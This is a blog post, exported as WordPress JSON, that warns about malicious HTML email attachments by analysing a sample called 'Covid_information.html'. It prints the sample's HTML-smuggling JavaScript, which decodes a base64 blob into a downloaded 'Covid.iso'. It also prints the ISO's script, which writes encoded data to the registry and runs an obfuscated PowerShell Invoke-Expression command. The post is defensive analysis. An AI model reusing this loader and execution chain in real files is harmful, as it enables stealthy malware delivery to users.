{"id":418,"date":"2021-11-06T06:14:06","date_gmt":"2021-11-06T06:14:06","guid":{"rendered":"http:\/\/www.volucer.it\/?p=418"},"modified":"2021-11-06T06:20:29","modified_gmt":"2021-11-06T06:20:29","slug":"never-open-in-a-web-browser-an-attachment-of-html-type","status":"publish","type":"post","link":"https:\/\/www.volucer.it\/?p=418","title":{"rendered":"BEWARE OF ATTACHMENTS IN HTML FORMAT"},"content":{"rendered":"\n

Everyone knows by now that you have to be very careful when surfing the internet. A little carelessness can cost you a lot and can lead to the loss of data and information, which are the most precious intangible asset today. As 72% of attacks coming into organizations were reported to be attacks through email, in this post I warn again about HTML files that can be received by email as attachments. They seem harmless but looking at them closely they hide a thousand pitfalls and dangers.<\/p>\n\n\n\n

\"\"<\/a>
At Application Level any device interact with the cyberspace mainly using mail client and web browser.<\/span><\/figcaption><\/figure>\n\n\n\n

<\/p>\n\n\n\n

As a demonstration of the above I\u2019m going to examine as much as possible an HTML file received as an attachment. It\u2019s named \u201cCovid_information.html<\/span>\u201d.<\/p>\n\n\n\n

\"\"<\/a>
Parallel use of many attack techniques: Spear Phishing, Malicious code in an HTML file and Web browser vulnerabilitie<\/span>s<\/figcaption><\/figure>\n\n\n\n

<\/p>\n\n\n\n

<\/p>\n\n\n\n

The JavaScript code inside \u201cCovid_information.html<\/span>\u201d is the following one.<\/p>\n\n\n\n

<\/script>\n\n  text=\u201da base-64 encoded long string of 1622 KB<\/strong>\u201d\n\n  function download(data, filename, type) {\n    var file = new Blob([data], {type: type});\n    if (window.navigator.msSaveOrOpenBlob) \n        window.navigator.msSaveOrOpenBlob(file, filename);\n    else { \n        var a = document.createElement(\"a\"),\n                url = URL.createObjectURL(file);\n        a.href = url;\n        a.download = filename;\n        document.body.appendChild(a);\n        a.click();\n        setTimeout(function() {\n            document.body.removeChild(a);\n            window.URL.revokeObjectURL(url);  \n        }, 0); \n    }\n}\nbt = atob(text);\nbN = new Array(bt.length);\nfor(var i =0;i < bt.length; i++){\n   bN[i] = bt.charCodeAt(i);\n}\nbA = new Uint8Array(bN);\ndownload(bA,\"Covid.iso\",\"application\/x-cd-image\")\n\n<\/script>\n<\/code><\/pre>\n\n\n\n
The first statement is an assignment to the variable \u201ctext\u201d of a base-64 encoded 1622 KB string. Practically this is the malicious payload to which we will give a look afterwards.<\/p>\n\n\n\n
After the function \u201cdownload\u201d:<\/p>\n\n\n\n
  1. creates a hyperlink on-fly;<\/li>
  2. link to it a file created using the content of data variable;<\/li>
  3. download this file. <\/li><\/ol>\n\n\n\n
    The following statement decode the base-64 content of \u201ctext\u201d using the atob() function.<\/p>\n\n\n\n
    The any char is transcoded to Unicode using charCodeAt() function. At the end the file named \"Covid.iso<\/span>\" is downloaded to the local storage.<\/p>\n\n\n\n
    An outlook to Covid.iso file.<\/h2>\n\n\n\n
    The file Covid.iso encapsulated an HTML file with the following JavaScript code:<\/p>\n\n\n\n
        <script language=\"javascript\">\n    var a = new ActiveXObject('Wscript.Shell');\n    function start() {\n        res = document.getElementById(\"p1\").innerHTML;\n        a.RegWrite(\"HKEY_CURRENT_USER\\\\SOFTWARE\\\\JavaSoft\\\\Ver\", res, \"REG_SZ\");\n        res = document.getElementById(\"p2\").innerHTML;\n        a.RegWrite(\"HKEY_CURRENT_USER\\\\SOFTWARE\\\\JavaSoft\\\\Ver2\", res, \"REG_SZ\");\n        res = document.getElementById(\"c1\").innerHTML;\n        res += document.getElementById(\"c2\").innerHTML;\n        res += document.getElementById(\"c3\").innerHTML;\n        res += document.getElementById(\"c4\").innerHTML;\n\n        res += document.getElementById(\"c5\").innerHTML;\n        a.Run(res, 0);\n        \n    }\n    <\/script>\n<\/code><\/pre>\n\n\n\n
    In this code what is crucial is the content of DOM elements which are on board of HTML file, that is: p1,p2,c1,c2,c3,c4 and c5.<\/p>\n\n\n\n
    These elements are used for a kind of obfuscation; because they are then assembled together in order to execute any sort of code in the host machine.<\/p>\n\n\n\n
    P1= (\u201ca base-64 encoded long string\u201d) containing a binary.<\/p>\n\n\n\n
    P2= (\u201ca base-64 encoded long string\u201d) containing code:<\/p>\n\n\n\n
    c1=powers<\/p>\n\n\n\n
    c2=hell -C Invo<\/p>\n\n\n\n
    c3=ke-Expression (g<\/p>\n\n\n\n
    c4=p HKCU:\\\\SO<\/p>\n\n\n\n
    c5=FTWARE\\\\JavaSoft).Ver<\/p>\n\n\n\n
    the final command is:<\/p>\n\n\n\n
    powershell -C Invoke-Expression (gp HKCU:\\\\SOFTWARE\\\\JavaSoft).Ver<\/p>\n\n\n\n
    Invoke-Expression cmdlet is used to perform a command or expression on local computer.<\/p>\n\n\n\n
    Even if the above analysis is not complete, it demonstrates a high level of sophistication resulting from guys with a high level of know-how.<\/p>\n\n\n\n
    So beware of attachments in HTML format!<\/p>\n\n\n\n
    References<\/h2>\n\n\n\n